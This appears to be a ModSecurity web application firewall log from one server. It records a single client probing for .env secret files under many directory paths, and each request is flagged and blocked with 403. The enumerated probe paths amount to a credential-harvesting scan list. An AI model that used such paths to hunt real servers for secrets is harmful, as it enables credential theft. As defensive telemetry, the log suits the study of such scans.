[Mon May 11 16:41:48.757759 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaigAAAMg"]
[Mon May 11 16:41:48.758367 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaigAAAMg"]
[Mon May 11 16:41:48.758606 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHqrFV4kyjgo4bQBUhaigAAAMg"]
[Mon May 11 16:41:49.098024 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajAAAAMg"]
[Mon May 11 16:41:49.195952 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajAAAAMg"]
[Mon May 11 16:41:49.196379 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajAAAAMg"]
[Mon May 11 16:41:49.393869 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajQAAAMg"]
[Mon May 11 16:41:49.394488 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajQAAAMg"]
[Mon May 11 16:41:49.394759 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dashboard/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajQAAAMg"]
[Mon May 11 16:41:49.569852 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajwAAAMg"]
[Mon May 11 16:41:49.570353 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajwAAAMg"]
[Mon May 11 16:41:49.570610 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/panel/.env"] [unique_id "agHqrVV4kyjgo4bQBUhajwAAAMg"]
[Mon May 11 16:41:49.747148 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakAAAAMg"]
[Mon May 11 16:41:49.747636 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakAAAAMg"]
[Mon May 11 16:41:49.747864 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakAAAAMg"]
[Mon May 11 16:41:49.918206 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakQAAAMg"]
[Mon May 11 16:41:49.918692 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakQAAAMg"]
[Mon May 11 16:41:49.918933 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/erp/.env"] [unique_id "agHqrVV4kyjgo4bQBUhakQAAAMg"]
[Mon May 11 16:41:50.146498 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakgAAAMg"]
[Mon May 11 16:41:50.146988 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakgAAAMg"]
[Mon May 11 16:41:50.147249 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakgAAAMg"]
[Mon May 11 16:41:50.313789 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakwAAAMg"]
[Mon May 11 16:41:50.314283 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakwAAAMg"]
[Mon May 11 16:41:50.314540 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/store/.env"] [unique_id "agHqrlV4kyjgo4bQBUhakwAAAMg"]
[Mon May 11 16:41:50.495063 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalQAAAMg"]
[Mon May 11 16:41:50.495563 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalQAAAMg"]
[Mon May 11 16:41:50.495803 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/saas/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalQAAAMg"]
[Mon May 11 16:41:50.661864 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalgAAAMg"]
[Mon May 11 16:41:50.662358 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalgAAAMg"]
[Mon May 11 16:41:50.662595 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalgAAAMg"]
[Mon May 11 16:41:50.825710 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalwAAAMg"]
[Mon May 11 16:41:50.826226 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalwAAAMg"]
[Mon May 11 16:41:50.826474 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/project/.env"] [unique_id "agHqrlV4kyjgo4bQBUhalwAAAMg"]
[Mon May 11 16:41:50.993408 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHqrlV4kyjgo4bQBUhamAAAAMg"]
[Mon May 11 16:41:50.993886 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHqrlV4kyjgo4bQBUhamAAAAMg"]
[Mon May 11 16:41:50.994122 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin-panel/.env"] [unique_id "agHqrlV4kyjgo4bQBUhamAAAAMg"]
[Mon May 11 16:41:51.162507 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamQAAAMg"]
[Mon May 11 16:41:51.162999 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamQAAAMg"]
[Mon May 11 16:41:51.163246 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/control-panel/.env"] [unique_id "agHqr1V4kyjgo4bQBUhamQAAAMg"]
